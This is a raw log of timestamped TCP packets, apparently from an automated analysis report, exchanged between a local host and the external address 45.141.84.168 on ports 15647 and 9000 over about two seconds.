                                          Nov 28, 2024 13:40:29.790760040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.792438030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.808423042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.808600903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.809587002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.809644938 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.811208010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.811278105 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.811331987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.821500063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.824285030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.825254917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.825308084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.825333118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.825372934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.834366083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.836282015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.838279009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.849107027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.849180937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.849392891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.849469900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.849499941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.849524021 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.861910105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.861968040 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.867563963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.867620945 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.868649006 CET90004984145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.878070116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.878209114 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.883158922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.890121937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.890201092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.890230894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.904198885 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.906681061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.906816959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.911971092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.924182892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.924238920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.924242020 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.928631067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.928958893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.931178093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.939402103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.939416885 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.939450979 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.939477921 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.957964897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.958868980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.960848093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.960916042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.960985899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.974970102 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.974989891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.975044966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.981790066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.985428095 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.987593889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.989267111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.992291927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.992423058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.010140896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.010155916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.010293961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.012175083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.012253046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.026863098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.028335094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.039330959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.039402962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.039499044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.053710938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.053755999 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.053839922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.063617945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.064280033 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.079251051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.082288027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.099567890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.099689007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.109661102 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.112296104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.125360012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.127619982 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.131571054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.133311987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.140430927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.142272949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.159245014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.160434961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.171483040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.171598911 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.176265001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.178281069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.192686081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.202647924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.202740908 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.203145027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.203310966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.203349113 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.211189985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.211263895 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.220611095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.220700979 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.228076935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.228123903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.228262901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.239746094 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.239800930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.239929914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.250969887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.251152039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.264538050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.264733076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.264822960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.264867067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.264925003 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.278286934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.280438900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.280548096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.280611038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.293282032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.294766903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.294840097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.296458006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.296536922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.306982994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.307097912 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.314060926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.314133883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.323365927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.323450089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.332554102 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.332653999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.346524954 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.348318100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.348413944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.364387035 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.371155024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.371246099 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.384396076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.384581089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.385941029 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.386012077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.398770094 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.398837090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.413366079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.413445950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.414717913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.414767981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.421811104 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.421885014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.434039116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.434123993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.435657978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.435832977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.450275898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.452685118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.452765942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.465437889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.466273069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.466298103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.466360092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.467469931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.467535973 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.484460115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.484532118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.485073090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.485130072 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.485157013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.495194912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.495300055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.495501995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.505264997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.505326986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.515846968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.515901089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.515904903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.515943050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.524424076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.533185959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.533226967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.533241034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.534641027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.549823999 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.549886942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.555783033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.555841923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.566479921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.566541910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.566766977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.570313931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.570383072 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.585555077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.585619926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.585913897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.585963011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.586008072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.586178064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.588167906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.588233948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.599666119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.599682093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.599714041 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.605021954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.605118990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.615041971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.615088940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.615117073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.628611088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.628624916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.628660917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.635471106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.635520935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.652873993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.654300928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.654341936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.654370070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.654411077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.669770002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.669784069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.669826984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.675615072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.675678015 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.675759077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.685863972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.685923100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.690422058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.690560102 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.692970991 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.693028927 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.693124056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.693167925 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.695980072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.696023941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.707768917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.707782984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.707859993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.719990969 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.720165014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.721012115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.721064091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.721107006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.734163046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.734338045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.750659943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.750838041 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.755537987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.755687952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.767824888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.767852068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.768018007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.772952080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.773036957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.773925066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.773974895 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.774039984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.774082899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.786865950 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.786971092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.787864923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.787944078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.788053036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.795670033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.795742989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.804575920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.804626942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.804656982 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.810595989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.810663939 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.813056946 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.813127995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.821091890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.821155071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.821177006 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.836752892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.836864948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.836941957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.836941957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.841521978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.841613054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.857671976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.857786894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.859010935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.876769066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.876854897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.888175011 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.888235092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.888395071 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.891715050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.891793966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.894812107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.895060062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.904376984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.904419899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.904458046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.907967091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.908154964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.918569088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.918653965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.918656111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.926841021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.926917076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.933623075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.933693886 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.946804047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.948860884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.948930025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.948956013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.957043886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.957103014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.971879959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.971910954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.971950054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:30.988091946 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.988127947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:30.988148928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.005703926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.005783081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.011676073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.011728048 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.017328978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.017401934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.028148890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.028230906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.040869951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.041743994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.041842937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.041845083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.053910017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.054502010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.056845903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.056921959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.058831930 CET90004984145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.058933973 CET90004984145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.058976889 CET498419000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.058990002 CET498419000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.068393946 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.068484068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.079480886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.079560995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.093637943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.096290112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.096460104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:31.105511904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:31.105526924 CET156474973045.141.84.168192.168.2.4
